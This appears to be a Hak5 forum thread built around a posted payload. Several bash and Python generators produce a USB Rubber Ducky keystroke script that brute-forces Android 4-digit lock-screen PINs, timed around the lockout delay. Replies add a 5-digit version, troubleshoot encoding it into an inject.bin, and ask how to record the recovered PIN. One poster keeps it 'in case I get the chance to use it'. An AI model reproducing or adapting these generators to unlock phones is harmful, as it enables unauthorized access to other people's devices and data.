Jump to content
Darren Kitchen

[Payload] Android Brute Force 4-digit pin

Recommended Posts

The Ducky script works great, Major props for this Darren. I've been using a micro USB hub 3 in 1 powered with an external battery to keep the phone charged for the time needed to brute force the pin. How can I amend the Ducky script to capture the correct pin as a text file on the Ducky?

Share this post


Link to post
Share on other sites
On 06/12/2012 at 11:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

Hey darren,

Any chance of putting your 600k script on github so we can look at it?
cheers

Share this post


Link to post
Share on other sites
echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt

5 digit 

Share this post


Link to post
Share on other sites
On 6/28/2017 at 0:36 PM, b0N3z said:

echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt

5 digit 

That will take a very long time..

Share this post


Link to post
Share on other sites
10 hours ago, Dave-ee Jones said:

That will take a very long time..

as per Darren about 166hrs

Share this post


Link to post
Share on other sites

Hey I make a script to make the 4 digit combination in Python so, if you have Python just copy the code and then run it and in the output you will have the combination.

In Python was more hard to make because Python is not maked to do Bruteforce and their limit but finally I make the code so.

(I am Just 15 Years and a starter on Python so possible the code can be better than that)

Here is the code:

"""
change x=int(Put a number) Down
Put only 1-9 and copy all code
and then you have the Payload
"""
x=int(0)
number=int(0)
while (number)<=9:
  print"STRING",(str(x))+"00"+str(number)
  print"ENTER"
  if (number) in list(range(0,9,5)):
   print"DELAY 34250"
   (number)+=int(1)
  else:
   number+=int(1)
   if (number) == 10:
    while number <= int(100):
     print"STRING",(str(x))+"0"+str(number)
     print"ENTER"
     if (number) in list(range(10,100,5)):
      print"DELAY 34250"
      (number)+=int(1)
     else:
      (number)+=int(1)
      if (number) == int(100):
       while number != int(1000):
         print"STRING",(str(x))+str(number)
         print"ENTER"
         if (number) in list(range(100,999,5)):
          print"DELAY 34250"
          (number)+=int(1)
         else:
          (number)+=int(1)
          if (number) == int(1000):
           x+=int(1)
           break

Share this post


Link to post
Share on other sites
On ‎12‎/‎12‎/‎2012 at 5:36 PM, keb0x80 said:

I created a script to generate pretty much the same output using only bash loops/conditions

 


#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
  count=$((count+1))
  echo "STRING $pin"
  # After every other pin, do this
  if [ $((count % 2)) -eq 0 ]; then
    echo "DELAY 1000"
    echo "ENTER"
    echo "ENTER"
  fi
  # After 5 pins, do this
  if [ $((count % 5)) -eq 0 ]; then
    for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) ))
    do
	  echo "DELAY 5000"
	  echo "ENTER"
    done
  fi
done
[/CODE]

 

I'm on the duck tool kit.com and when I put this is the encoder it rejects it as "does not recognize  !in bash.  What am I doing wrong?

Share this post


Link to post
Share on other sites
On ‎12‎/‎6‎/‎2012 at 7:38 PM, Darren Kitchen said:

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

 

On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

Im in duck tool kit.com and trying to use this script but it doesn't work.  What am I doing wrong?

Share this post


Link to post
Share on other sites
On ‎6‎/‎30‎/‎2017 at 0:15 PM, b0N3z said:

as per Darren about 166hrs

Im on the duck tool kit and I can't see to get the script to work. any insight?

Share this post


Link to post
Share on other sites

The script is made to run in a bash terminal to create the text file needed to make the inject.bin file for the ducky.  This wont work with just trying to convert the command.

Share this post


Link to post
Share on other sites
On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

So how do I use this code on your duck tool kit.com site?

Share this post


Link to post
Share on other sites
On 7/5/2017 at 6:24 PM, TTT101907 said:

So how do I use this code on your duck tool kit.com site?

Do you have linux?

Share this post


Link to post
Share on other sites

hi, im a newbie :P ..  how i can on Encode this code for work and create Inject.bin?

then put into Android Smartphone with USB rubber Ducky?


Because the code

#!/bin/bashclearecho -e "========================================================"echo -e " This script downloads the rockyou password list"echo -e " 
	

 

IT SAYS that is not language appropriate and i can't create inject file on duckytools.THanks

 

Share this post


Link to post
Share on other sites

This method won't work on my Android phone. It's set to use the Sim-pin, so 3 wrong tries and you'll need the PUK (aka. SuperPIN) :grin:

But I have it saved locally in case I get the chance to use it.

Share this post


Link to post
Share on other sites
3 hours ago, fabrice said:

I think it's not for the sim pin, but only for android device access.

I know :wink: It's only for the android-based access code option.

Share this post


Link to post
Share on other sites

To summarize new users. The code provided are designed to be executed within a Linux shell. It will then output a file named

android_brute-force_0000-9999.txt

From there, take that and encode it on ducktoolkit.com. There is one line for every pin combination, why it's 600k.

I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results.

Share this post


Link to post
Share on other sites

When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help 

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE] 

The original script^

Share this post


Link to post
Share on other sites
8 hours ago, Jay1 said:

When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help 

It generates the text-file android_brute-force_0000-9999.txt which you have to encode.

The script you posted has to be executed in a shell

Share this post


Link to post
Share on other sites

Does anyone have an idea as to how you would do this if the keypad doesn't allow for numerical entry? For example, it won't recognize numbers, you have to use UDLR and then enter to select a number of the pin. 

Share this post


Link to post
Share on other sites
On 1/16/2018 at 3:43 AM, cmd97 said:

To summarize new users. The code provided are designed to be executed within a Linux shell. It will then output a file named


android_brute-force_0000-9999.txt

From there, take that and encode it on ducktoolkit.com. There is one line for every pin combination, why it's 600k.

I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results.

I doubt it will work on such a recent version ...
Surely it works up to the Kitkat version (4.4.2) and maybe (I'm not sure) up to 5.0, but the new android versions after some attempts increase exponentially the waiting time between one attempt and another, and then you should fix the script even just to give it a try ....

Share this post


Link to post
Share on other sites

Hello Darren I love the show and all the information you guys put out> i just got my rubber ducky not long ago and have been messing around with it. i was wondering if there is a way to save the information gathered to the rubberduck itself? and would i be able to say use a 8GB micro instead of the one it came with. sorry if my question seems ignorant or anything im just curious!!

 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...